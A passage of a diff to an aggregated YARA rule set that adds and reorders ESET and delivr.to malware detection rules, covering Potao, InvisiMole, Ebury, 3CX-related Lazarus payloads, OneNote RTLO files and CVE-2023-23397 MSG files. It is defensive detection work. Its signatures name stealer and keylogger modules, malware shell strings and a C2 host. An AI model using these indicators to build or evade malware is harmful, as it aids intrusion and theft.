-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
- */
-private rule ESET_Invisimole_Blob_PRIVATE
+rule DELIVRTO_SUSP_HTML_WASM_Smuggling
 {
 	meta:
-		description = "Detects InvisiMole blobs by magic values"
-		author = "ESET Research"
-		id = "6a179d91-50f1-5400-b141-0f162efd2431"
-		date = "2021-05-17"
-		modified = "2021-05-17"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L34-L52"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067"
-		score = 75
+		description = "Presence of Base64 JavaScript blob loading WASM"
+		author = "delivr.to"
+		id = "fc83bb4f-ba8a-52d2-b9ce-632da5341f77"
+		date = "2024-02-28"
+		modified = "2024-05-24"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/html_wasm.yar#L1-L13"
+		license_url = "N/A"
+		logic_hash = "4bca88862c28db947c04c40e40fdecc682223d1eb90c98350fbd6c5d8c6c4636"
+		score = 70
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$magic_old_32 = {F9 FF D0 DE}
-		$magic_old_64 = {64 FF D0 DE}
-		$magic_new_32 = {86 DA 11 CE}
-		$magic_new_64 = {64 DA 11 CE}
-
-	condition:
-		($magic_old_32 at 0 ) or ( $magic_old_64 at 0 ) or ( $magic_new_32 at 0 ) or ( $magic_new_64 at 0 )
-}
-private rule ESET_Potaosecondstage_PRIVATE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "c1baace9-f481-533a-aa85-df5ba14069f2"
-		date = "2015-07-30"
-		modified = "2015-07-30"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L81-L95"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "55f9fc2da09aa9c2e76725985c836f7b8ba5e0b69a9327fb911e8265b340b88c"
-		score = 75
-		quality = 28
-		tags = ""
-
-	strings:
-		$mz = { 4d 5a }
-		$binary1 = {51 7A BB 85 [10-180] E8 47 D2 A8}
-		$binary2 = {5F 21 63 DD [10-30] EC FD 33 02}
-		$binary3 = {CA 77 67 57 [10-30] BA 08 20 7A}
-		$str1 = "?AVCrypt32Import@@"
-		$str2 = "%.5llx"
-
-	condition:
-		($mz at 0 ) and any of ( $binary* ) and any of ( $str* )
-}
-private rule ESET_Potaousb_PRIVATE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "98fd84cb-d8e8-5aed-a1ac-f1099be5a5db"
-		date = "2015-07-30"
-		modified = "2015-07-30"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L71-L80"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "8f72afbf3b123ea3914b3eade267bd21f7435fbf9fbde4049ca2600513bb31d9"
-		score = 75
-		quality = 28
-		tags = ""
 
 	strings:
-		$mz = { 4d 5a }
-		$binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 }
-		$binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 00 EB B1 5E 8B E5 5D C3}
+		$wasm = "WebAssembly.Module" base64
+		$int = "WebAssembly.Instance" base64
+		$inst = "WebAssembly.instantiate" base64
 
 	condition:
-		($mz at 0 ) and any of ( $binary* )
+		all of them
 }
-private rule ESET_Potaodll_PRIVATE
+rule DELIVRTO_SUSP_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "a53ff170-ed3a-5ee9-a262-bb2f77aba092"
-		date = "2015-07-30"
-		modified = "2015-07-30"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L46-L70"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "1d1154eb10cc70b3252e3ca4a85789e8605f2f3b7044f03ec960fd56ab81886a"
-		score = 75
-		quality = 28
-		tags = ""
-
-	strings:
-		$mz = { 4d 5a }
-		$dllstr1 = "?AVCncBuffer@@"
-		$dllstr2 = "?AVCncRequest@@"
-		$dllstr3 = "Petrozavodskaya, 11, 9"
-		$dllstr4 = "_Scan@0"
-		$dllstr5 = "\x00/sync/document/"
-		$dllstr6 = "\\temp.temp"
-		$dllname1 = "node69MainModule.dll"
-		$dllname2 = "node69-main.dll"
-		$dllname3 = "node69MainModuleD.dll"
-		$dllname4 = "task-diskscanner.dll"
-		$dllname5 = "\x00Screen.dll"
-		$dllname6 = "Poker2.dll"
-		$dllname7 = "PasswordStealer.dll"
-		$dllname8 = "KeyLog2Runner.dll"
-		$dllname9 = "GetAllSystemInfo.dll"
-		$dllname10 = "FilePathStealer.dll"
+		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
+		author = "delivr.to"
+		id = "a0ede2d3-7789-5662-9575-5d0a5cf4457c"
+		date = "2023-03-15"
+		modified = "2023-03-15"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/msg_cve_2023_23397.yar#L1-L20"
+		license_url = "N/A"
+		logic_hash = "0476cf7f93c4f6cc48c19933f31360b62fe5e339f6a2a31dee8ad95f83ce67d7"
+		score = 60
+		quality = 80
+		tags = "CVE-2023-23397, FILE"
+
+	strings:
+		$app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$rfp = { 1F 85 00 00 }
 
 	condition:
-		($mz at 0 ) and ( any of ( $dllstr* ) and any of ( $dllname* ) )
+		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and $app and $rfp
 }
-private rule ESET_Potaodecoy_PRIVATE
+rule DELIVRTO_SUSP_Onenote_RTLO_Character_Feb23 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "215f1821-f70d-547e-b261-335dc1300bf2"
-		date = "2015-07-30"
-		modified = "2015-07-30"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L32-L45"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "93cbe1d1545d1fb85b3218b68619e67a1dda80d5888d2685a04915b861dfce01"
-		score = 75
-		quality = 28
-		tags = ""
+		description = "Presence of RTLO Unicode Character in a OneNote file with embedded files"
+		author = "delivr.to"
+		id = "03d86391-1392-5734-af5f-8a2c7b99167a"
+		date = "2023-02-17"
+		modified = "2023-02-17"
+		reference = "https://github.com/delivr-to/detections"
+		source_url = "https://github.com/delivr-to/detections/blob/376762d71eb1777874d366136595994378416ef5/yara-rules/onenote_rtlo_filename.yar#L1-L22"
+		license_url = "N/A"
+		logic_hash = "286bc1ab1f5df0d64634f53cc82357187306c40b063b156f36b602e131262c7a"
+		score = 60
+		quality = 55
+		tags = "FILE"
 
 	strings:
-		$mz = { 4d 5a }
-		$str1 = "eroqw11"
-		$str2 = "2sfsdf"
-		$str3 = "RtlDecompressBuffer"
-		$wiki_str = "spanned more than 100 years and ruined three consecutive" wide
-		$old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)}
-		$old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00}
+		$one = { E4 52 5C 7B 8C D8 A7 4D AE B1 53 78 D0 29 96 D3 }
+		$fdso = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$rtlo = { 00 2E 20 }
 
 	condition:
-		($mz at 0 ) and ( ( all of ( $str* ) ) or any of ( $old_ver* ) or $wiki_str )
+		filesize < 5MB and ( $one at 0 ) and $fdso and $rtlo
 }
+/*
+ * YARA Rule Set
+ * Repository Name: ESET
+ * Repository: https://github.com/eset/malware-ioc
+ * Retrieval Date: 2025-06-15
+ * Git Commit: eeab168d4cd6bac7c5bd06defb3d7198bd58f37f
+ * Number of Rules: 103
+ * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * Copyright (c) 2014-2018 ESET spol. s r.o.
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+ */
 private rule ESET_Prikormkaearlyversion_PRIVATE
 {
 	meta:
@@ -67915,6 +68331,28 @@ private rule ESET_Prikormkadropper_PRIVATE
 	condition:
 		($mz at 0 ) and ( ( any of ( $bin* ) ) or ( 3 of ( $kd* ) ) or ( all of ( $inj* ) ) )
 }
+private rule ESET_Is_Elf_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "6389dc72-ac97-5366-83f2-2e9bcf618ae4"
+		date = "2016-11-01"
+		modified = "2016-11-01"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L32-L39"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "2a3c9a875852cd3ce86d43b9e4a6ba786ecbae1f18bba73a3bef5b7e8ba67a3b"
+		score = 75
+		quality = 80
+		tags = ""
+
+	strings:
+		$header = { 7F 45 4C 46 }
+
+	condition:
+		$header at 0
+}
 
 private rule ESET_Not_Ms_PRIVATE
 {
@@ -67935,6 +68373,33 @@ private rule ESET_Not_Ms_PRIVATE
 	condition:
 		not for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . issuer contains "Microsoft Corporation" )
 }
+private rule ESET_Invisimole_Blob_PRIVATE
+{
+	meta:
+		description = "Detects InvisiMole blobs by magic values"
+		author = "ESET Research"
+		id = "6a179d91-50f1-5400-b141-0f162efd2431"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/invisimole/invisimole.yar#L34-L52"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067"
+		score = 75
+		quality = 80
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$magic_old_32 = {F9 FF D0 DE}
+		$magic_old_64 = {64 FF D0 DE}
+		$magic_new_32 = {86 DA 11 CE}
+		$magic_new_64 = {64 DA 11 CE}
+
+	condition:
+		($magic_old_32 at 0 ) or ( $magic_old_64 at 0 ) or ( $magic_new_32 at 0 ) or ( $magic_new_64 at 0 )
+}
 
 private rule ESET_Apachemodule_PRIVATE
 {
@@ -67961,6 +68426,123 @@ private rule ESET_Apachemodule_PRIVATE
 	condition:
 		for any s in elf.dynsym : ( s.type == elf.STT_OBJECT and for any seg in elf.segments : ( seg.type == elf.PT_LOAD and s.value >= seg.virtual_address and s.value < ( seg.virtual_address + seg.file_size ) and $magic at ( s.value - seg.virtual_address + seg.offset ) + 0x28 ) )
 }
+private rule ESET_Potaosecondstage_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "c1baace9-f481-533a-aa85-df5ba14069f2"
+		date = "2015-07-30"
+		modified = "2015-07-30"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L81-L95"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "55f9fc2da09aa9c2e76725985c836f7b8ba5e0b69a9327fb911e8265b340b88c"
+		score = 75
+		quality = 28
+		tags = ""
+
+	strings:
+		$mz = { 4d 5a }
+		$binary1 = {51 7A BB 85 [10-180] E8 47 D2 A8}
+		$binary2 = {5F 21 63 DD [10-30] EC FD 33 02}
+		$binary3 = {CA 77 67 57 [10-30] BA 08 20 7A}
+		$str1 = "?AVCrypt32Import@@"
+		$str2 = "%.5llx"
+
+	condition:
+		($mz at 0 ) and any of ( $binary* ) and any of ( $str* )
+}
+private rule ESET_Potaousb_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "98fd84cb-d8e8-5aed-a1ac-f1099be5a5db"
+		date = "2015-07-30"
+		modified = "2015-07-30"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L71-L80"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "8f72afbf3b123ea3914b3eade267bd21f7435fbf9fbde4049ca2600513bb31d9"
+		score = 75
+		quality = 28
+		tags = ""
+
+	strings:
+		$mz = { 4d 5a }
+		$binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 }
+		$binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 00 EB B1 5E 8B E5 5D C3}
+
+	condition:
+		($mz at 0 ) and any of ( $binary* )
+}
+private rule ESET_Potaodll_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "a53ff170-ed3a-5ee9-a262-bb2f77aba092"
+		date = "2015-07-30"
+		modified = "2015-07-30"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L46-L70"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "1d1154eb10cc70b3252e3ca4a85789e8605f2f3b7044f03ec960fd56ab81886a"
+		score = 75
+		quality = 28
+		tags = ""
+
+	strings:
+		$mz = { 4d 5a }
+		$dllstr1 = "?AVCncBuffer@@"
+		$dllstr2 = "?AVCncRequest@@"
+		$dllstr3 = "Petrozavodskaya, 11, 9"
+		$dllstr4 = "_Scan@0"
+		$dllstr5 = "\x00/sync/document/"
+		$dllstr6 = "\\temp.temp"
+		$dllname1 = "node69MainModule.dll"
+		$dllname2 = "node69-main.dll"
+		$dllname3 = "node69MainModuleD.dll"
+		$dllname4 = "task-diskscanner.dll"
+		$dllname5 = "\x00Screen.dll"
+		$dllname6 = "Poker2.dll"
+		$dllname7 = "PasswordStealer.dll"
+		$dllname8 = "KeyLog2Runner.dll"
+		$dllname9 = "GetAllSystemInfo.dll"
+		$dllname10 = "FilePathStealer.dll"
+
+	condition:
+		($mz at 0 ) and ( any of ( $dllstr* ) and any of ( $dllname* ) )
+}
+private rule ESET_Potaodecoy_PRIVATE
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "215f1821-f70d-547e-b261-335dc1300bf2"
+		date = "2015-07-30"
+		modified = "2015-07-30"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L32-L45"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "93cbe1d1545d1fb85b3218b68619e67a1dda80d5888d2685a04915b861dfce01"
+		score = 75
+		quality = 28
+		tags = ""
+
+	strings:
+		$mz = { 4d 5a }
+		$str1 = "eroqw11"
+		$str2 = "2sfsdf"
+		$str3 = "RtlDecompressBuffer"
+		$wiki_str = "spanned more than 100 years and ruined three consecutive" wide
+		$old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)}
+		$old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00}
+
+	condition:
+		($mz at 0 ) and ( ( all of ( $str* ) ) or any of ( $old_ver* ) or $wiki_str )
+}
 
 private rule ESET_IIS_Native_Module_PRIVATE : FILE
 {
@@ -68029,115 +68611,54 @@ private rule ESET_IIS_Native_Module_PRIVATE : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and pe.exports ( "RegisterModule" ) and any of ( $e* )
 }
-private rule ESET_Is_Elf_PRIVATE
+
+rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "6389dc72-ac97-5366-83f2-2e9bcf618ae4"
-		date = "2016-11-01"
-		modified = "2016-11-01"
+		description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12"
+		author = "ESET Research"
+		id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094"
+		date = "2023-03-31"
+		modified = "2023-04-19"
 		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L32-L39"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "2a3c9a875852cd3ce86d43b9e4a6ba786ecbae1f18bba73a3bef5b7e8ba67a3b"
+		hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b"
+		hash = "cad1120d91b812acafef7175f949dd1b09c6c21a"
+		hash = "5b03294b72c0caa5fb20e7817002c600645eb475"
+		hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec"
+		logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16"
 		score = 75
 		quality = 80
 		tags = ""
 
-	strings:
-		$header = { 7F 45 4C 46 }
-
-	condition:
-		$header at 0
-}
-rule ESET_Moose_1
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc"
-		date = "2015-04-21"
-		modified = "2016-11-01"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L41-L76"
-		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6"
-		score = 75
-		quality = 30
-		tags = ""
-		Author = "Thomas Dupuy"
-		Description = "Linux/Moose malware"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	strings:
-		$s0 = "Status: OK"
-		$s1 = "--scrypt"
-		$s2 = "stratum+tcp://"
-		$s3 = "cmd.so"
-		$s4 = "/Challenge"
-		$s7 = "processor"
-		$s9 = "cpu model"
-		$s21 = "password is wrong"
-		$s22 = "password:"
-		$s23 = "uthentication failed"
-		$s24 = "sh"
-		$s25 = "ps"
-		$s26 = "echo -n -e "
-		$s27 = "chmod"
-		$s28 = "elan2"
-		$s29 = "elan3"
-		$s30 = "chmod: not found"
-		$s31 = "cat /proc/cpuinfo"
-		$s32 = "/proc/%s/cmdline"
-		$s33 = "kill %s"
-
 	condition:
-		ESET_Is_Elf_PRIVATE and all of them
+		pe.rich_signature.toolid( 259 , 30818 ) == 9 and pe.rich_signature.toolid ( 256 , 31329 ) == 1 and pe.rich_signature.toolid ( 261 , 30818 ) >= 30 and pe.rich_signature.toolid ( 261 , 30818 ) <= 38 and pe.rich_signature.toolid ( 261 , 29395 ) >= 134 and pe.rich_signature.toolid ( 261 , 29395 ) <= 164 and pe.rich_signature.toolid ( 257 , 29395 ) >= 6 and pe.rich_signature.toolid ( 257 , 29395 ) <= 14
 }
-rule ESET_Moose_2
+rule ESET_Mumblehard_Packer
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "74372984-dace-5665-a5d0-39b8d1002fa1"
-		date = "2016-10-02"
-		modified = "2016-11-01"
-		reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
-		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/moose/linux-moose.yar#L78-L110"
+		description = "Mumblehard i386 assembly code responsible for decrypting Perl code"
+		author = "Marc-Etienne M.Léveillé"
+		id = "981c18e3-ac28-54f5-97ab-44b1d12a1389"
+		date = "2015-04-07"
+		modified = "2015-05-01"
+		reference = "http://www.welivesecurity.com"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/mumblehard/mumblehard_packer.yar#L32-L47"
 		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
-		logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43"
+		logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Thomas Dupuy"
-		Description = "Linux/Moose malware active since September 2015"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "Modules are loaded"
-		$s2 = "--scrypt"
-		$s3 = "http://"
-		$s4 = "https://"
-		$s5 = "processor "
-		$s6 = "cpu model "
-		$s7 = "Host: www.challpok.cn"
-		$s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s"
-		$s9 = "fail!"
-		$s10 = "H3lL0WoRlD"
-		$s11 = "crondd"
-		$s12 = "cat /proc/cpuinfo"
-		$s13 = "Set-Cookie: PHPSESSID="
-		$s14 = "Set-Cookie: LP="
-		$s15 = "Set-Cookie: WL="
-		$s16 = "Set-Cookie: CP="
-		$s17 = "Loading modules..."
-		$s18 = "-nobg"
+		$decrypt = { 31 db  [1-10]  ba ?? 00 00 00  [0-6]  (56 5f |  89 F7)
+                     39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00
+                     00 31 db 43 ac 30 d8 aa 43 e2 e2 }
 
 	condition:
-		ESET_Is_Elf_PRIVATE and 5 of them
+		$decrypt
 }
 rule ESET_IIS_Group02
 {
@@ -68610,6 +69131,135 @@ rule ESET_IIS_Group14
 	condition:
 		ESET_IIS_Native_Module_PRIVATE and 2 of ( $i* ) or 5 of them
 }
+rule ESET_Potao
+{
+	meta:
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "9c755cb8-9e3f-5118-a8e0-4ded9a075cbd"
+		date = "2015-07-29"
+		modified = "2015-07-30"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/potao/PotaoNew.yara#L96-L108"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		logic_hash = "c68addb14f7c22cec0c4d58bfffd373b2e3eb5c53a5b65532c84574e073fcbba"
+		score = 75
+		quality = 80
+		tags = ""
+		Author = "Anton Cherepanov"
+		Description = "Operation Potao"
+		Contact = "threatintel@eset.com"
+		License = "BSD 2-Clause"
+
+	condition:
+		ESET_Potaodecoy_PRIVATE or ESET_Potaodll_PRIVATE or ESET_Potaousb_PRIVATE or ESET_Potaosecondstage_PRIVATE
+}
+
+rule ESET_Libkeyutils_With_Ctor
+{
+	meta:
+		description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY."
+		author = "ESET, spol. s r.o."
+		id = "7b466bf7-f895-569d-99b0-eca95a6ebc83"
+		date = "2024-02-01"
+		modified = "2024-04-29"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/windigo/ebury.yar#L3-L54"
+		license_url = "https://github.com/eset/malware-ioc/blob/eeab168d4cd6bac7c5bd06defb3d7198bd58f37f/LICENSE"
+		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
+		logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214"
+		score = 75
+		quality = 80
+		tags = ""
+		license = "BSD 2-Clause"
+		version = 2
+
+	strings:
+		$libname = "libkeyutils.so.1"
+
+	condition:
+		for any ptr_size in ( 4 , 8 ) : ( ( ( ptr_size == 4 and elf.machine == elf.EM_386 ) or ( ptr_size == 8 and elf.machine == elf.EM_X86_64 ) ) and for any d in elf.dynamic : ( d.type == elf.DT_SONAME and ( for any s in elf.sections : ( s.name == ".dynstr" and $libname at ( s.offset + d.val ) ) or for any s in elf.dynamic : ( s.type == elf.DT_STRTAB and $libname at ( s.val + d.val ) ) ) ) and ( for any s in elf.sections : ( s.name == ".ctors" and s.size > 2 * ptr_size ) or for any d in elf.dynamic : ( d.type == elf.DT_INIT_ARRAYSZ and d.val > ptr_size ) ) )
+}
+rule ESET_Ebury_V1_7_Crypto
+{
+	meta:
+		description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8"
+		author = "ESET, spol. s r.o."
+		id = "93dadf5f-b572-5217-8c82-4957c6d24955"
+		date = "2023-08-01"
+		modified = "2024-04-29"
